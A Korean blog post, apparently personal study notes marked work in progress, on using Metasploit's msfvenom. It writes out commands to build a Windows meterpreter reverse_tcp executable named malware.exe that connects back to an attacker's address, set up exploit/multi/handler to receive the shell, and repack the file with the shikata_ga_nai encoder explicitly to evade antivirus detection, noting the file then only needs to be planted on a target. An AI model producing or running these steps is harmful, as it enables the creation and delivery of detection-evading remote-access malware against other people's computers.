딩굴댕굴

Metasploit - 08. msfvenom [작업중]

by jennysgap

BOX

msfvenom

# type msfvenom

# msfvenom -l


# msfvenom -l payload


msf를 이용한 악성 도구 제작

# msfvenom -l <key> : <key값>payload, encorder, nop 등의 모듈 정보 확인

# msfvenom -p windows/meterpreter/reverse_tcp lhost=Attacker_IP lport=Attacker_PORT

  -f <file-type: exe, raw, c> -o File_NAME


악성도구가 만들어졌으니 심어주면 됨.

어태커는 서버용 프로그램 준비만 하면 됨.


# msfvenom -l payload


 * 작성될 shell code 보기

# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.3.116 lport=2000 -f c 


 * PE형태 windows 실행 파일 작성

# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.3.116 lport=2000 -f exe -o malware.exe

나중에 이걸로 bf모드 공격할 때 사용할 예정. 그러니 코드 잘 봐두세욥


# ls -l malware.exe

# chmod 755 malware.exe

# file malware.exe


공격자 서버용 프로그램 준비

# msfconsole

msf> search exploit


msf> use exploit/multi/handler

클라이언트인데 지정하지 못할 때, RHOST, RPORT를 지정하지 못 할 때 이용

msf> set PAYLOAD windows/meterpreter/reverse_tcp

msf> set LHOST 192.168.3.116 (공격자 IP)

msf> set LPORT 2000 (공격자 PORT)

msf> exploit

* Packing(encoding) 기술 적용 (백신 탐지 우회)

# msfvenom -l encoder

# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.3.116 lport=2000 -f exe 

  -e <encoding_name> -i 1 -o malware.exe

-i : 몇번을 꼬을지 횟수

* 다른 악성도구 가져와서 패킹해도 됨! 단 신규로만!

* 패킹 된 파일은 패킹이 안됨! 

        * 윈도우7이든 윈도우xp든 다 됨


# msfvenom -l encoder

x86/shikata_ga_nai






# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.3.116 lport=2000 -f exe -e x86/shikata_ga_nai -i 2 -o malware2.exe






다른 컴퓨터로 업로드나 다운로드 할 수 있음

윈도우 cmd 에서 할 수 있음

netsh>


리눅스와 윈도우 파일 공유하려면

1. samba를 이용하거나

2. share 폴더를 만들거나

3. ftp로 연결한다.


http://lureout.tistory.com/44

반응형

블로그의 정보

jennysgap

jennysgap

활동하기